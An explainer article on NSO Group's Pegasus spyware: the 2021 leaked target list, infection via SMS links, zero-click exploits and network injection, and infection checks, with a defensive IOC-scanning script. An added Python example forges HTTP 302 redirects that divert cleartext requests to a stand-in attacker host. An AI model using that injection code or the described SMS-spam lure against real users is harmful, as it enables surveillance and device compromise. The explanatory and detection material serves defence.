How Pegasus spyware works and why it’s almost impossible to track it

Traces of the Pegasus spyware have been found on the phones of journalists and activists around the world, and a leaked list of potential surveillance targets contains more than 50,000 phone numbers. This article explains how the Israeli spyware Pegasus works and why it is so hard to detect.

Pegasus is spyware that can be invisibly installed on mobile phones and other devices running some versions of the Apple iOS and Android mobile operating systems.

It was developed by the Israeli company NSO Group. The developer says it provides "authorized governments with technology to help them fight terrorism and crime" and has published sections of its contracts that require customers to use Pegasus only for criminal-investigation and national-security purposes.

The developer also claims to be attentive to human rights.

Pegasus software features
Pegasus infects iPhones and Android devices via SMS, WhatsApp, iMessage and possibly other channels. It can extract messages, photos, emails, contacts and GPS data, record calls, and silently switch on the microphone and camera.

Pegasus gives the operator control of the device itself and access to everything stored on it. It logs keystrokes on the infected device, which captures all written communications and searches, including passwords, and transmits them to the client.

Pegasus has evolved from a relatively simple tool that relied mainly on social-engineering attacks into one that no longer needs the victim to tap a link for the phone to be compromised.

Pegasus mass surveillance scandal
In July 2021, there were reports in the press that authoritarian regimes were using Pegasus to hack the phones of human rights defenders, opposition journalists, and lawyers.

List of victims
The press leaked a list of more than 50,000 phone numbers of people presumably of interest to NSO Group clients. The origin of the list is unknown, as is whether these phones were hacked with the help of Pegasus.

Among the NSO clients whose law-enforcement agencies and intelligence services entered numbers into the system are:

  • Azerbaijan,
  • Bahrain,
  • Hungary,
  • India,
  • Kazakhstan,
  • Morocco,
  • Mexico,
  • United Arab Emirates,
  • Rwanda,
  • Saudi Arabia.

In particular, Pegasus was used to monitor the phones of two women close to the Saudi journalist Jamal Khashoggi, who was killed in October 2018. Also on the list were the phone numbers of Princess Latifa, the daughter of the ruler of Dubai, Mohammed Al Maktoum, and of his ex-wife, Princess Haya al-Hussein.

The Pegasus targets reportedly include about 600 government officials from 34 countries, including:

  • Iraqi President Barham Saleh,
  • South African President Cyril Ramaphosa,
  • the prime ministers of Pakistan, Egypt and Morocco.

According to the Paris newspaper Le Monde, in 2017 Moroccan intelligence selected the number used by French President Emmanuel Macron as a potential target, which means his phone could have been exposed to Pegasus infection.

NSO position
NSO denies the allegations. The company says Pegasus was designed to fight terrorism and crime and is supplied only to the military, police and intelligence services of countries that respect human rights.

The company said in a statement that the accusations made by the French NGO Forbidden Stories and the human rights group Amnesty International are based on incorrect assumptions and unconfirmed theories.

How Pegasus works

Malicious links
Earlier versions required the victim to tap a malicious link: the operators sent a text message containing the link to the target's phone number, and NSO Group used a variety of pretexts to raise the chance of a click.

For example, a target would first be flooded with spam to annoy them, and then sent another message with a link that supposedly had to be followed to stop the spam.

Over time, targets learned to recognise such links as malicious and stopped reacting to spam and other provocations.

Zero-click exploits
The newer tactic is to use so-called "zero-click" exploits, which rely on vulnerabilities in widely used apps such as iMessage, WhatsApp and FaceTime. All of these apps receive and parse data, often from senders the user has never interacted with, so a bug in that parsing code is reachable by anyone who can send the target a message or a call.

Once such a vulnerability has been found, the exploit is delivered over the app's own protocol, for example inside a specially crafted message or an incoming call. The user does not need to follow a link, read the message or answer the call.

Pegasus has reportedly been able to pull data from most popular messaging and mail apps, including:

  • Gmail,
  • Facebook,
  • WhatsApp,
  • FaceTime,
  • Viber,
  • WeChat,
  • Telegram,
  • built-in messengers and Apple Mail.

Network injections
Besides zero-click exploits, NSO Group clients can use so-called "network injections" to reach a phone unnoticed. Here ordinary web browsing exposes the device without any maliciously crafted link being sent to it.

With this approach the attacker sits on the target's network path, for example with the cooperation of the mobile operator or via a rogue base station, and waits for the phone to request a site over unencrypted HTTP during normal use. That cleartext request is answered, or redirected, with attacker-controlled content, and the phone is infected from there. Traffic protected by TLS (HTTPS) cannot be tampered with this way, which is why the attack depends on the target hitting an unsecured site.

This method is harder to use than a malicious link or a zero-click exploit, because it requires being positioned on the target's network path and watching the phone's traffic until an unprotected request appears.
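The following is an added example, not code from the article or from NSO Group. It simulates the decision an on-path "network injector" makes when it sees the first bytes of a connection from the target phone: for a cleartext HTTP GET it forges a 302 redirect to an attacker-controlled host, while a TLS ClientHello yields nothing, because without the site's private key the injector cannot produce a response the client will accept. The host name EXPLOIT_HOST and all request bytes are constructed placeholders.

```python
# Added example (not the article's or NSO Group's code): simulated on-path
# injector showing why the attack needs cleartext traffic.
EXPLOIT_HOST = "exploit.example.invalid"  # hypothetical attacker-controlled host


def classify(first_bytes: bytes) -> str:
    """Classify the opening bytes of a TCP stream as 'tls', 'http' or 'unknown'."""
    # A TLS record starts with content type 0x16 (handshake) followed by a
    # 0x03 0x0X protocol version; that is what a ClientHello looks like on the wire.
    if first_bytes[:1] == b"\x16" and first_bytes[1:2] == b"\x03":
        return "tls"
    request_line = first_bytes.split(b"\r\n", 1)[0]
    if request_line.endswith((b" HTTP/1.1", b" HTTP/1.0")):
        return "http"
    return "unknown"


def forge_redirect(first_bytes: bytes):
    """Return a forged 302 response that diverts a cleartext GET to the
    exploit host, or None when the stream cannot be tampered with."""
    if classify(first_bytes) != "http":
        return None
    request_line = first_bytes.split(b"\r\n", 1)[0].decode("ascii", "replace")
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "GET":
        return None
    path = parts[1] if parts[1].startswith("/") else "/" + parts[1]
    # Keep the original path so the redirect looks like an ordinary site move.
    location = f"http://{EXPLOIT_HOST}{path}"
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


# Constructed sample traffic: a cleartext request and the start of a TLS ClientHello.
CLEARTEXT_REQUEST = b"GET /news/today HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
TLS_CLIENT_HELLO = b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03" + b"\x00" * 32


def demo():
    """Run the injector against both samples; only the cleartext one is diverted."""
    return {
        "cleartext": forge_redirect(CLEARTEXT_REQUEST),
        "tls": forge_redirect(TLS_CLIENT_HELLO),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result.decode() if result else "no injection possible")
```

The practical defence follows directly from the `tls` branch: HTTPS everywhere plus HSTS (ideally preloaded), because a bare hostname typed into a browser goes out as a cleartext HTTP request unless the browser already knows the site as HSTS-only.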

How to understand if a device is infected
To check a device for Pegasus, start with the most obvious indicator: links in text messages that point to one of the domains NSO Group has used to deliver the spyware to phones. Those domains are the company's own infrastructure, so matching message URLs against a list of known delivery domains is the first check.

Forensic analyses have also found that infected devices run a recognisable set of malicious processes. Only a few dozen such process names are known, and one of them, Bridgehead (BH), recurs across infections.

Infected devices also show a characteristic sequence in their logs:

  • a website was visited,
  • an application crashed,
  • some files were created or changed.

That order (delivery, then the exploit firing, then the implant being written to disk) is what distinguishes an infection from an ordinary app crash.
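The following is an added example, not code from the article, from NSO Group or from any forensic toolkit. It runs the three checks this section describes over constructed sample data: links in SMS that hit known delivery domains, known malicious process names, and the visit, crash, file-change sequence in time order. The domains in IOC_DOMAINS and every sample record are made up for this example; the process name "bh" is the one the article mentions.

```python
# Added example (not the article's code): minimal IOC scan over constructed data.
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

IOC_DOMAINS = {"example-ioc.invalid", "cdn-update.invalid"}  # hypothetical, not real IOCs
IOC_PROCESSES = {"bh"}  # "Bridgehead" / BH, the process name the article mentions
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


def is_ioc_domain(host: str) -> bool:
    """Exact match or any subdomain of an IOC domain (track.example-ioc.invalid hits)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def suspicious_sms(messages):
    """messages: iterable of (sender, text). Returns (sender, host) pairs that hit IOCs."""
    hits = []
    for sender, text in messages:
        for host in URL_RE.findall(text):
            if is_ioc_domain(host):
                hits.append((sender, host.lower()))
    return hits


def suspicious_processes(process_names):
    """Process names from a running-process list that match known malicious names."""
    return sorted({p for p in process_names if p.lower() in IOC_PROCESSES})


@dataclass
class Event:
    ts: datetime
    kind: str     # "visit", "crash" or "filechange"
    detail: str


def infection_chains(events, window=timedelta(minutes=5)):
    """Return (visit, crash, filechange) triples occurring in that order within
    `window` of the visit. Order matters: a crash before the visit, or a file
    change before the crash, is not the pattern described."""
    events = sorted(events, key=lambda e: e.ts)
    chains = []
    for i, visit in enumerate(events):
        if visit.kind != "visit":
            continue
        deadline = visit.ts + window
        crash = next((e for e in events[i + 1:]
                      if e.kind == "crash" and e.ts <= deadline), None)
        if crash is None:
            continue
        change = next((e for e in events
                       if e.kind == "filechange" and crash.ts < e.ts <= deadline), None)
        if change is not None:
            chains.append((visit.detail, crash.detail, change.detail))
    return chains


def scan(messages, process_names, events):
    """Combine the three checks into one verdict."""
    sms = suspicious_sms(messages)
    procs = suspicious_processes(process_names)
    chains = infection_chains(events)
    return {"sms": sms, "processes": procs, "chains": chains,
            "verdict": "suspicious" if (sms or procs or chains) else "clean"}


# Constructed sample data standing in for an SMS database, a process list and a
# merged browser-history / crash-log / filesystem timeline.
SAMPLE_SMS = [
    ("+10000000001", "Your parcel is held: http://track.example-ioc.invalid/p/19"),
    ("+10000000002", "see you at 5"),
    ("+10000000003", "To stop these messages visit https://cdn-update.invalid/stop"),
]
SAMPLE_PROCS = ["launchd", "SpringBoard", "bh", "mobilemail"]
T = datetime(2021, 7, 18, 10, 0, 0)
SAMPLE_EVENTS = [
    Event(T - timedelta(hours=1), "visit", "news.example.com"),  # benign: no crash follows
    Event(T, "visit", "track.example-ioc.invalid"),
    Event(T + timedelta(seconds=12), "crash", "com.apple.MobileSMS"),
    Event(T + timedelta(seconds=40), "filechange", "/private/var/tmp/x.plist"),
]

if __name__ == "__main__":
    print(scan(SAMPLE_SMS, SAMPLE_PROCS, SAMPLE_EVENTS))
```

In a real investigation the IOC sets come from a published indicator list such as Amnesty International's, the inputs come from a full device backup or filesystem dump rather than hand-built records, and a clean result only means none of the known indicators were found, not that the device is uninfected.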



Alexandr Ivanov, Web Developer and Editor. Alexandr earned his Licentiate Engineer degree in Systems and Computer Engineering from the Free International University of Moldova and has worked as a freelance web programmer since 2013.
